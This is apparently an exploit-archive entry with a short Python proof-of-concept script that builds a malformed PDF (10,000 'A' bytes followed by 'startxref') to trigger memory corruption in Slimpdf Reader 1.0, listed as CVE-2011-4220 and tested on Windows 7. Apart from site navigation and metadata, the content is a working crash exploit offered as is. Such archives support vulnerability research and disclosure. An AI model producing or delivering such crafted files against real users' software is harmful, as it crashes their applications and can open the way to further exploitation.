[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Slimpdf Reader 1.0 Memory Corruption
# Published : 2012-06-25
# Author :
# Previous Title : Sorensoft Power Media 6.0 Denial of Service
# Next Title : WinRadius Server 2009 Denial Of Service
# Exploit Title:
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.investintech.com
# Version:1.0
# Tested on: Windows 7
# CVE : cve-2011-4220
payload ="A"*10000
crash="startxref"
pdf=payload+crash
filename = "slimpdPoC.pdf"
file = open(filename,"w")
file.writelines(pdf)
file.close()